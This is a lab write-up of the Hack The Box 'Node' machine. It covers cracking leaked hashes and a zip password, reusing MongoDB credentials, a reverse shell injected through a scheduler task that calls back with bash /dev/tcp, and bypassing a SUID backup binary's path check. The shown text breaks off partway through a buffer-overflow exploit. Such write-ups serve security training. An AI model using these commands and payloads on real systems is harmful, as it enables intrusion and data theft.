Node
Enumeration
As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.
The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:
nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.58 -oN allPorts
-sSuse the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.--min-rate 5000nmap will try to keep the sending rate at or above 5000 packets per second.-p-scanning the entire port range, from 1 to 65535.-T5insane mode, it is the fastest mode of the nmap time template.-Pnassume the host is online.-nscan without reverse DNS resolution.-oNsave the scan result into a file, in this case the allports file.
# Nmap 7.92 scan initiated Wed Sep 14 16:44:10 2022 as: nmap -sS --min-rate 5000 -n -Pn -p- -oN allPorts 10.10.10.58
Nmap scan report for 10.10.10.58
Host is up (0.045s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
3000/tcp open ppp
# Nmap done at Wed Sep 14 16:44:37 2022 -- 1 IP address (1 host up) scanned in 26.54 secondsNow that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:
nmap -sC -sV -p22,3000 10.10.10.58 -oN targeted
-sCperforms the scan using the default set of scripts.-sVenables version detection.-oNsave the scan result into file, in this case the targeted file.
# Nmap 7.92 scan initiated Wed Sep 14 16:44:57 2022 as: nmap -sCV -p22,3000 -oN targeted 10.10.10.58
Nmap scan report for 10.10.10.58
Host is up (0.037s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 dc:5e:34:a6:25:db:43:ec:eb:40:f4:96:7b:8e:d1:da (RSA)
| 256 6c:8e:5e:5f:4f:d5:41:7d:18:95:d1:dc:2e:3f:e5:9c (ECDSA)
|_ 256 d8:78:b8:5d:85:ff:ad:7b:e6:e2:b5:da:1e:52:62:36 (ED25519)
3000/tcp open hadoop-datanode Apache Hadoop
| hadoop-datanode-info:
|_ Logs: /login
| hadoop-tasktracker-info:
|_ Logs: /login
|_http-title: MyPlace
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Sep 14 16:45:12 2022 -- 1 IP address (1 host up) scanned in 15.21 secondsTo get more information of the website on port 3000, let's see what the Wappalyzer extension detects.
The website is made in Node.js. It shows some users on the main page.
Exploitation
In the source code, we can see a few JavaScript files.
The script /assets/js/app/controllers/admin.js shows the /login directory, which contains a login page.
var controllers = angular.module('controllers');
controllers.controller('AdminCtrl', function ($scope, $http, $location, $window) {
$scope.backup = function () {
$window.open('/api/admin/backup', '_self');
}
$http.get('/api/session')
.then(function (res) {
if (res.data.authenticated) {
$scope.user = res.data.user;
}
else {
$location.path('/login');
}
});
});
The /assets/js/app/controllers/profile.js JavaScript file shows the /api/users/ directory, which contains users, and their password hashes.
var controllers = angular.module('controllers');
controllers.controller('ProfileCtrl', function ($scope, $http, $routeParams) {
$http.get('/api/users/' + $routeParams.username)
.then(function (res) {
$scope.user = res.data;
}, function (res) {
$scope.hasError = true;
if (res.status == 404) {
$scope.errorMessage = 'This user does not exist';
}
else {
$scope.errorMessage = 'An unexpected error occurred';
}
});
});
There is one user called myP14ceAdm1nAcc0uNT which is the admin user for the website. Let's make use of rainbow tables and try to find out the password.
Let's try to log in with those credentials in the /login page.
There is a button Download Backup, which will download a file called myplace.backup.
The file has a giant string encoded in base64.
cat myplace.backup
UEsDBAo...UAAAA=If we decoded, we'll see that it seems to be a .zip file. Let's put all the content in myplace.backup.zip.
cat myplace.backup | base64 -d > myplace.backup.zip
We can't unzip it because we need a password.
unzip myplace.backup.zip
Archive: myplace.backup.zip
creating: var/www/myplace/
[myplace.backup.zip] var/www/myplace/package-lock.json password:Let's get the hash of the .zip file.
zip2john myplace.backup.zip 2>/dev/null > myplace.backup.hash
Now, john should be able to crack the hash pretty fast.
john --wordlist=/usr/share/wordlists/rockyou.txt myplace.backup.hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
magicword (myplace.backup.zip)
1g 0:00:00:00 DONE (2022-09-14 23:09) 10.00g/s 1843Kp/s 1843Kc/s 1843KC/s sandriux..joan21
Use the "--show" option to display all of the cracked passwords reliably
Session completed.Now, we can unzip the file.
unzip myplace.backup.zip
It looks like a backup of the entire /var/www/html directory. If we take a look inside the app.js file, we'll see some credentials.
cat var/www/html/app.js
const url = 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/myplace?authMechanism=DEFAULT&authSource=myplace';Let's try to log in as the mark user in the machine via SSH.
sshpass -p '5AYRft73VtFpc84k' ssh mark@10.10.10.58
.-.
.-'``(|||)
,`\ \ `-`. 88 88
/ \ '``-. ` 88 88
.-. , `___: 88 88 88,888, 88 88 ,88888, 88888 88 88
(:::) : ___ 88 88 88 88 88 88 88 88 88 88 88
`-` ` , : 88 88 88 88 88 88 88 88 88 88 88
\ / ,..-` , 88 88 88 88 88 88 88 88 88 88 88
`./ / .-.` '88888' '88888' '88888' 88 88 '8888 '88888'
`-..-( )
`-`
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
Last login: Wed Sep 27 02:33:14 2017 from 10.10.14.3
mark@node:~$ whoami
markIf we search for SUID binaries in the system, we'll see one called /usr/local/bin/backup, which only root and users in the admin group can execute.
find / -perm /4000 2>/dev/null | xargs ls -l
...
-rwsr-xr-- 1 root admin 16484 Sep 3 2017 /usr/local/bin/backup
...Only root and tom are members of the admin group.
cat /etc/group | grep admin
admin:x:1002:tom,rootWe might need to become tom. Let's see if there is any process run by tom.
ps aux | grep tom
tom 1239 0.0 6.4 1023660 49212 ? Ssl 21:26 0:01 /usr/bin/node /var/www/myplace/app.js
tom 1244 0.0 5.3 1008056 40392 ? Ssl 21:26 0:01 /usr/bin/node /var/scheduler/app.jsThere are a few processes. The second one is running the /var/scheduler/app.js script. The script is logging into a MongoDB app with the credentials we found earlier. Then, is checking inside the scheduler database for the tasks collection, and executing the value of the cmd key.
cat /var/scheduler/app.js
const exec = require('child_process').exec;
const MongoClient = require('mongodb').MongoClient;
const ObjectID = require('mongodb').ObjectID;
const url = 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/scheduler?authMechanism=DEFAULT&authSource=scheduler';
MongoClient.connect(url, function(error, db) {
if (error || !db) {
console.log('[!] Failed to connect to mongodb');
return;
}
setInterval(function () {
db.collection('tasks').find().toArray(function (error, docs) {
if (!error && docs) {
docs.forEach(function (doc) {
if (doc) {
console.log('Executing task ' + doc._id + '...');
exec(doc.cmd);
db.collection('tasks').deleteOne({ _id: new ObjectID(doc._id) });
}
});
}
else if (error) {
console.log('Something went wrong: ' + error);
}
});
}, 30000);
});Let's set a netcat listener on port 4444.
nc -lvnp 4444
-llisten mode.-vverbose mode.-nnumeric-only IP, no DNS resolution.-pspecify the port to listen on.
Access the scheduler database in MongoDB with the credentials in the script.
mongo -u mark -p 5AYRft73VtFpc84k scheduler
MongoDB shell version: 3.2.16
connecting to: scheduler
>As expected, there is one collection called tasks.
show collections
tasksNow, let's insert into the tasks collection the key cmd with a command as a value, which will send us a reverse shell on port 4444.
db.tasks.insert({"cmd":"bash -c 'bash -i >& /dev/tcp/10.10.14.11/4444 0>&1'"})
listening on [any] 4444 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.58] 40680
bash: cannot set terminal process group (1244): Inappropriate ioctl for device
bash: no job control in this shell
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
tom@node:/$ whoami
whoami
tom
tom@node:/$ cat /home/tom/user.txt
cat /home/tom/user.txt
275c83d75312ae33f5522e08aeec505aPrivilege Escalation
First, let's set an interactive TTY shell.
script /dev/null -c /bin/bash
Then I press Ctrl+Z and execute the following command on my local machine:
stty raw -echo; fg
reset
Terminal type? xterm
Next, I export a few variables:
export TERM=xterm
export SHELL=bash
Finally, I run the following command in our local machine:
stty size
51 236And set the proper dimensions in the victim machine:
stty rows 51 columns 236
Now that we belong to the admin group, we can execute the SUID binary.
id
uid=1000(tom) gid=1000(tom) groups=1000(tom),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),115(lpadmin),116(sambashare),1002(admin)If we execute the script by itself nothing happens.
backup
But if we execute it with three arguments, we get some output.
backup a b c
____________________________________________________
/ \
| _____________________________________________ |
| | | |
| | | |
| | | |
| | | |
| | | |
| | | |
| | Secure Backup v1.0 | |
| | | |
| | | |
| | | |
| | | |
| | | |
| | | |
| |_____________________________________________| |
| |
\_____________________________________________________/
\_______________________________________/
_______________________________________________
_-' .-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-. --- `-_
_-'.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.--. .-.-.`-_
_-'.-.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-`__`. .-.-.-.`-_
_-'.-.-.-.-. .-----.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-----. .-.-.-.-.`-_
_-'.-.-.-.-.-. .---.-. .-----------------------------. .-.---. .---.-.-.-.`-_
:-----------------------------------------------------------------------------:
`---._.-----------------------------------------------------------------._.---'
[!] Ah-ah-ah! You didn't say the magic word!Let's take a look with ltrace how the program is being executed. First, we can see that it is trying to compare the first argument with -q. This argument seems to activate the quiet mode.
ltrace backup a b c
...
strcmp("a", "-q") = 1
...Second, it is comparing the second argument with each key stored in /etc/myplace/keys.
ltrace backup -q b c
...
fopen("/etc/myplace/keys", "r") = 0x9e2f410
fgets("a01a6aa5aaf1d7729f35c8278daae30f"..., 1000, 0x9e2f410) = 0xff84b8af
strcspn("a01a6aa5aaf1d7729f35c8278daae30f"..., "\n") = 64
strcmp("b", "a01a6aa5aaf1d7729f35c8278daae30f"...) = 1
fgets("45fac180e9eee72f4fd2d9386ea7033e"..., 1000, 0x9e2f410) = 0xff84b8af
strcspn("45fac180e9eee72f4fd2d9386ea7033e"..., "\n") = 64
strcmp("b", "45fac180e9eee72f4fd2d9386ea7033e"...) = 1
fgets("3de811f4ab2b7543eaf45df611c2dd25"..., 1000, 0x9e2f410) = 0xff84b8af
strcspn("3de811f4ab2b7543eaf45df611c2dd25"..., "\n") = 64
strcmp("b", "3de811f4ab2b7543eaf45df611c2dd25"...) = 1
...We can take a look at the /etc/myplace/keys file.
cat /etc/myplace/keys
a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508
45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474
3de811f4ab2b7543eaf45df611c2dd2541a5fc5af601772638b81dce6852d110If we run the binary without the quiet mode, and giving a proper key, we'll see that it is checking if the third argument exists.
backup a a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508 c
...
[+] Validated access token
[+] Starting archiving c
[!] The target path doesn't exist
...If we try to give it a path that exists, such as /tmp, we'll get a base64 encoded string.
backup a a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508 /tmp
...
[+] Validated access token
[+] Starting archiving /tmp
zip warning: No such device or address
[+] Finished! Encoded backup is below:
UEsDBAoAAAA...FgMAAAAAWith ltrace, we can see that it is creating a ZIP file with the protected password magicword, and then it is encoding the content in base64.
ltrace backup a a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508 /tmp
...
sprintf("/usr/bin/zip -r -P magicword /tm"..., "/usr/bin/zip -r -P magicword %s "..., "/tmp/.backup_1940724586", "/tmp") = 69
...As this binary is SUID, and we are executing it as root, we could try to give the /root path as an argument, so then we can decode it, unzip it and take the root flag.
backup a a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508 /root
...
[+] Validated access token
[+] Finished! Encoded backup is below:
UEsDBD...AB4EAAAAAA==Let's copy the string, put it in the root.encoded file, decode it, and put the content in the root.zip file.
cat root.encoded | base64 -d > root.zip
Then, decompress the file with 7z giving the password magicword.
7z x root.zip
7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs Intel(R) Core(TM) i7-6500U CPU @ 2.50GHz (406E3),ASM,AES-NI)
Scanning the drive for archives:
1 file, 1141 bytes (2 KiB)
Extracting archive: root.zip
--
Path = root.zip
Type = zip
Physical Size = 1141
Enter password (will not be echoed): magicword
Everything is Ok
Size: 2584
Compressed: 1141But, if we see the root flag, we'll see that we got trolled.
cat root.txt
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQQQQQWQQQQQWWWBBBHHHHHHHHHBWWWQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQD!`__ssaaaaaaaaaass_ass_s____. -~""??9VWQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQP'_wmQQQWWBWV?GwwwmmWQmwwwwwgmZUVVHAqwaaaac,"?9$QQQQQQQQQQQQQQ
QQQQQQQQQQQW! aQWQQQQW?qw#TTSgwawwggywawwpY?T?TYTYTXmwwgZ$ma/-?4QQQQQQQQQQQ
QQQQQQQQQQW' jQQQQWTqwDYauT9mmwwawww?WWWWQQQQQ@TT?TVTT9HQQQQQQw,-4QQQQQQQQQ
QQQQQQQQQQ[ jQQQQQyWVw2$wWWQQQWWQWWWW7WQQQQQQQQPWWQQQWQQw7WQQQWWc)WWQQQQQQQ
QQQQQQQQQf jQQQQQWWmWmmQWU???????9WWQmWQQQQQQQWjWQQQQQQQWQmQQQQWL 4QQQQQQQQ
QQQQQQQP'.yQQQQQQQQQQQP" <wa,.!4WQQQQQQQWdWP??!"??4WWQQQWQQc ?QWQQQQQ
QQQQQP'_a.<aamQQQW!<yF "!` .. "??$Qa "WQQQWTVP' "??' =QQmWWV?46/ ?QQQQQ
QQQP'sdyWQP?!`.-"?46mQQQQQQT!mQQgaa. <wWQQWQaa _aawmWWQQQQQQQQQWP4a7g -WWQQ
QQ[ j@mQP'adQQP4ga, -????" <jQQQQQWQQQQQQQQQWW;)WQWWWW9QQP?"` -?QzQ7L ]QQQ
QW jQkQ@ jWQQD'-?$QQQQQQQQQQQQQQQQQWWQWQQQWQQQc "4QQQQa .QP4QQQQfWkl jQQQ
QE ]QkQk $D?` waa "?9WWQQQP??T?47`_aamQQQQQQWWQw,-?QWWQQQQQ`"QQQD\Qf(.QWQQ
QQ,-Qm4Q/-QmQ6 "WWQma/ "??QQQQQQL 4W"- -?$QQQQWP`s,awT$QQQ@ "QW@?$:.yQQQQ
QQm/-4wTQgQWQQ, ?4WWk 4waac -???$waQQQQQQQQF??'<mWWWWWQW?^ ` ]6QQ' yQQQQQ
QQQQw,-?QmWQQQQw a, ?QWWQQQw _. "????9VWaamQWV???" a j/ ]QQf jQQQQQQ
QQQQQQw,"4QQQQQQm,-$Qa ???4F jQQQQQwc <aaas _aaaaa 4QW ]E )WQ`=QQQQQQQ
QQQQQQWQ/ $QQQQQQQa ?H ]Wwa, ???9WWWh dQWWW,=QWWU? ?! )WQ ]QQQQQQQ
QQQQQQQQQc-QWQQQQQW6, QWQWQQQk <c jWQ ]QQQQQQQ
QQQQQQQQQQ,"$WQQWQQQQg,."?QQQQ'.mQQQmaa,., . .; QWQ.]QQQQQQQ
QQQQQQQQQWQa ?$WQQWQQQQQa,."?( mQQQQQQW[:QQQQm[ ammF jy! j( } jQQQ(:QQQQQQQ
QQQQQQQQQQWWma "9gw?9gdB?QQwa, -??T$WQQ;:QQQWQ ]WWD _Qf +?! _jQQQWf QQQQQQQ
QQQQQQQQQQQQQQQws "Tqau?9maZ?WQmaas,, --~-- --- . _ssawmQQQQQQk 3QQQQWQ
QQQQQQQQQQQQQQQQWQga,-?9mwad?1wdT9WQQQQQWVVTTYY?YTVWQQQQWWD5mQQPQQQ ]QQQQQQ
QQQQQQQWQQQQQQQQQQQWQQwa,-??$QwadV}<wBHHVHWWBHHUWWBVTTTV5awBQQD6QQQ ]QQQQQQ
QQQQQQQQQQQQQQQQQQQQQQWWQQga,-"9$WQQmmwwmBUUHTTVWBWQQQQWVT?96aQWQQQ ]QQQQQQ
QQQQQQQQQQWQQQQWQQQQQQQQQQQWQQma,-?9$QQWWQQQQQQQWmQmmmmmQWQQQQWQQW(.yQQQQQW
QQQQQQQQQQQQQWQQQQQQWQQQQQQQQQQQQQga%,. -??9$QQQQQQQQQQQWQQWQQV? sWQQQQQQQ
QQQQQQQQQWQQQQQQQQQQQQQQWQQQQQQQQQQQWQQQQmywaa,;~^"!???????!^`_saQWWQQQQQQQ
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQWWWWQQQQQmwywwwwwwmQQWQQQQQQQQQQQ
QQQQQQQWQQQWQQQQQQWQQQWQQQQQWQQQQQQQQQQQQQQQQWQQQQQWQQQWWWQQQQQQQQQQQQQQQWQIf we take a look at the command with ltrace, we'll see that at some point it is checking if the third argument is /root.
ltrace backup a a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508 /root
strstr("/root", "/root") = "/root" The problem is that it is checking if it is /root, so we could go to the / directory and execute the binary giving root as the third argument. This way we can bypass the restriction, and we'll be able to zip the root directory.
cd /
backup a a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508 root
...
[+] Validated access token
[+] Starting archiving root
[+] Finished! Encoded backup is below:
UEsDBAoAAAAAA....gIAAKAKAAAAAA==Let's make the root.zip file again.
cat root.encoded | base64 -d > root.zip
Then, decompress the file with 7z giving the password magicword.
7z x root.zip
7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs Intel(R) Core(TM) i7-6500U CPU @ 2.50GHz (406E3),ASM,AES-NI)
Scanning the drive for archives:
1 file, 1141 bytes (2 KiB)
Extracting archive: root.zip
--
Path = root.zip
Type = zip
Physical Size = 1141
Enter password (will not be echoed): magicword
Everything is Ok
Size: 2584
Compressed: 1141This time we are able to see the correct root flag.
cat root/root.txt
ebbdb9069c32150e8a14029e929c5839Buffer Overflow
There is a way to get a shell as root by exploiting a buffer overflow vulnerability in the backup binary. If we give 1000 A characters as the third argument of the binary, we'll get a segmentation fault.
backup a a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508 $(python -c "print('A'*1000)")
...
Segmentation fault (core dumped)Let's transfer the binary to our local machine. Set a netcat listener on port 5555 pointing to backup.
nc -lvnp 5555 > backup
Then, transfer the binary from the victim machine.
nc 10.10.14.11 5555 < /usr/local/bin/backup
In order to make the binary work, we'll have to give it execution permissions, and we'll have to create the /etc/myplace/keys file on our local machine with the keys.
chmod +x backup
nano /etc/myplace/keys
a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508
45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474
3de811f4ab2b7543eaf45df611c2dd2541a5fc5af601772638b81dce6852d110We are ready to exploit the buffer overflow. Let's run the binary with gdb.
gdb ./backup
Copyright (C) 2022 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
GEF for linux ready, type `gef' to start, `gef config' to configure
90 commands loaded and 5 functions added for GDB 12.1 in 0.00ms using Python engine 3.10
Reading symbols from ./backup...
(No debugging symbols found in ./backup)Note that I am using gef. The same way as before, if I run the script with 1000 A characters, it will crash, and I'll be able to see all the registries filled with 41.
gef⤠r $(python -c "print('A'*500)")
[ Legend: Modified register | Code | Heap | Stack | String ]
âââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââ registers ââââ
$eax : 0x40b
$ebx : 0xffffcf70 â 0x00000004
$ecx : 0x0
$edx : 0xf7fc41c0 â 0xf7fc41c0 â [loop detected]
$esp : 0xffffbe90 â "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
$ebp : 0x41414141 ("AAAA"?)
$esi : 0xffffd024 â 0xffffd1b7 â "/home/alfa8sa/HTB/machines/node/backup"
$edi : 0xffffcebf â 0x00796500
$eip : 0x41414141 ("AAAA"?)
$eflags: [zero carry parity adjust SIGN trap INTERRUPT direction overflow RESUME virtualx86 identification]
$cs: 0x23 $ss: 0x2b $ds: 0x2b $es: 0x2b $fs: 0x00 $gs: 0x63
âââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââ stack ââââ
0xffffbe90â+0x0000: "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]" â $esp
0xffffbe94â+0x0004: "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
0xffffbe98â+0x0008: "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
0xffffbe9câ+0x000c: "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
0xffffbea0â+0x0010: "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
0xffffbea4â+0x0014: "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
0xffffbea8â+0x0018: "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
0xffffbeacâ+0x001c: "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
âââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââ code:x86:32 ââââ
[!] Cannot disassemble from $PC
[!] Cannot access memory at address 0x41414141
âââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââ threads ââââ
[#0] Id 1, Name: "backup", stopped 0x41414141 in ?? (), reason: SIGSEGV
âââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââ trace ââââ
ââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââThe program only has the NX memory protection enabled.
gef⤠checksec
[+] checksec for '/home/alfa8sa/HTB/machines/node/backup'
Canary : â
NX : â
PIE : â
Fortify : â
RelRO : PartialBut, we can see that ASLR is enabled on the victim machine.
cat /proc/sys/kernel/randomize_va_space
2As ASLR is enabled, and the NX memory protection is enabled, the easiest way of exploiting this buffer overflow vulnerability is doing a Return to libc attack.
First, let's check at what point we start overwriting the EIP. Create a pattern with gef.
gef⤠pattern create 1000
[+] Generating a pattern of 1000 bytes (n=4)
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaezaafbaafcaafdaafeaaffaafgaafhaafiaafjaafkaaflaafmaafnaafoaafpaafqaafraafsaaftaafuaafvaafwaafxaafyaafzaagbaagcaagdaageaagfaaggaaghaagiaagjaagkaaglaagmaagnaagoaagpaagqaagraagsaagtaaguaagvaagwaagxaagyaagzaahbaahcaahdaaheaahfaahgaahhaahiaahjaahkaahlaahmaahnaahoaahpaahqaahraahsaahtaahuaahvaahwaahxaahyaahzaaibaaicaaidaaieaaifaaigaaihaaiiaaijaaikaailaaimaainaaioaaipaaiqaairaaisaaitaaiuaaivaaiwaaixaaiyaaizaajbaajcaajdaajeaajfaajgaajhaajiaajjaajkaajlaajmaajnaajoaajpaajqaajraajsaajtaajuaajvaajwaajxaajyaaj
[+] Saved as '$_gef0'And execute the program giving the pattern as the third argument.
gef⤠r a a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508 aaaab...yaaj
[ Legend: Modified register | Code | Heap | Stack | String ]
âââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââ registers ââââ
$eax : 0x40b
$ebx : 0xffffcf70 â 0x00000004
$ecx : 0x0
$edx : 0xf7fc41c0 â 0xf7fc41c0 â [loop detected]
$esp : 0xffffbe90 â "eaaffaafgaafhaafiaafjaafkaaflaafmaafnaafoaafpaafqa[...]"
$ebp : 0x66616163 ("caaf"?)
$esi : 0xffffd024 â 0xffffd1b7 â "/home/alfa8sa/HTB/machines/node/backup"
$edi : 0xffffcebf â 0x00796500
$eip : 0x66616164 ("daaf"?)
$eflags: [zero carry parity adjust SIGN trap INTERRUPT direction overflow RESUME virtualx86 identification]
$cs: 0x23 $ss: 0x2b $ds: 0x2b $es: 0x2b $fs: 0x00 $gs: 0x63
âââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââ stack ââââ
0xffffbe90â+0x0000: "eaaffaafgaafhaafiaafjaafkaaflaafmaafnaafoaafpaafqa[...]" â $esp
0xffffbe94â+0x0004: "faafgaafhaafiaafjaafkaaflaafmaafnaafoaafpaafqaafra[...]"
0xffffbe98â+0x0008: "gaafhaafiaafjaafkaaflaafmaafnaafoaafpaafqaafraafsa[...]"
0xffffbe9câ+0x000c: "haafiaafjaafkaaflaafmaafnaafoaafpaafqaafraafsaafta[...]"
0xffffbea0â+0x0010: "iaafjaafkaaflaafmaafnaafoaafpaafqaafraafsaaftaafua[...]"
0xffffbea4â+0x0014: "jaafkaaflaafmaafnaafoaafpaafqaafraafsaaftaafuaafva[...]"
0xffffbea8â+0x0018: "kaaflaafmaafnaafoaafpaafqaafraafsaaftaafuaafvaafwa[...]"
0xffffbeacâ+0x001c: "laafmaafnaafoaafpaafqaafraafsaaftaafuaafvaafwaafxa[...]"
âââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââ code:x86:32 ââââ
[!] Cannot disassemble from $PC
[!] Cannot access memory at address 0x66616164
âââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââ threads ââââ
[#0] Id 1, Name: "backup", stopped 0x66616164 in ?? (), reason: SIGSEGV
âââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââ trace ââââ
ââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââAs we see, the EIP has the vale daaf. With that value, we could see that the offset is 512.
gef⤠pattern offset $eip
[+] Searching for '$eip'
[+] Found at offset 512 (little-endian search) likely
[+] Found at offset 320 (big-endian search)Now, as I have control of the EIP, I could fill it with B characters.
gef⤠r a a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508 $(python -c "print('A'*512+'B'*4)")
[ Legend: Modified register | Code | Heap | Stack | String ]
âââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââ registers ââââ
$eax : 0x227
$ebx : 0xffffd150 â 0x00000004
$ecx : 0x0
$edx : 0xf7fc41c0 â 0xf7fc41c0 â [loop detected]
$esp : 0xffffc070 â 0xffffd400 â "c508"
$ebp : 0x41414141 ("AAAA"?)
$esi : 0xffffd204 â 0xffffd39b â "/home/alfa8sa/HTB/machines/node/backup"
$edi : 0xffffd09f â 0x00796500
$eip : 0x42424242 ("BBBB"?)
$eflags: [zero carry PARITY adjust SIGN trap INTERRUPT direction overflow RESUME virtualx86 identification]
$cs: 0x23 $ss: 0x2b $ds: 0x2b $es: 0x2b $fs: 0x00 $gs: 0x63
âââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââ stack ââââ
0xffffc070â+0x0000: 0xffffd400 â "c508" â $esp
